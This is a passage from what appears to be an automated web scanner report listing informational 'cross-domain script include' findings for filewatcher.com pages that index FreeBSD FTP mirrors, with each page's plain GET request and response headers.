21.845. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-8-current.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-8-current.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-8-current.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:52 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ThJo9BQkZIyrwn8LJvQe1Q"
Content-Length: 26484
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 668
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.846. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-8-current/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-8-current/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-8-current/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:53 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ds7U19Do71a1+HUOGbUbhw"
Content-Length: 24494
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 669
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.847. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Y6jvHZmDZXYZlHbEvkl1+Q"
Content-Length: 5409
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 478
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.848. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "P95cKLXK8vUKmIvgGsWH6g"
Content-Length: 7958
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 482
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.849. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "jaasUbMbVUV6hVShNtimyA"
Content-Length: 13241
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 484
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.850. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "SKpe6fwAixjXy0o1tXJYRA"
Content-Length: 23376
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 485
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.851. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "5CRAnSxQqpTHPsP0MN+zSw"
Content-Length: 9639
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 485
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.852. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.3-release.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.3-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.3-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7h7me37ew+svpwGC/ziMgQ"
Content-Length: 26281
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 508
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.853. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.3-release/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.3-release/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.3-release/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:34 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QxWQV7WmtsVIm6SQAOypAw"
Content-Length: 51450
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 508
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.854. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.4-release.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.4-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.4-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IrvLvAi/RbR1UGdEF8E3rg"
Content-Length: 26284
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 497
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.855. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.4-release/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.4-release/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.4-release/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:31 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GD6KFkW1EUSA45sW5RuB5g"
Content-Length: 21282
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 499
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.856. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7-stable.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7-stable.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7-stable.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:29 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "xuLMAyL5YfFrfRhd9lAs2w"
Content-Length: 26105
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 487
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.857. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7-stable/Latest.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7-stable/Latest.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7-stable/Latest.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IcogOyFpADQGBut0IOKEFg"
Content-Length: 19802
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 495
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.858. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "5YPceyKcJeMh8qIzKrwOeg"
Content-Length: 26281
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 503
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.859. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "l9Xxaj92VV7aMBMxOsZ0mw"
Content-Length: 29544
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 506
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.860. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZZ3aysPG32EoKXFWWVX8oA"
Content-Length: 26284
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 486
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.861. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
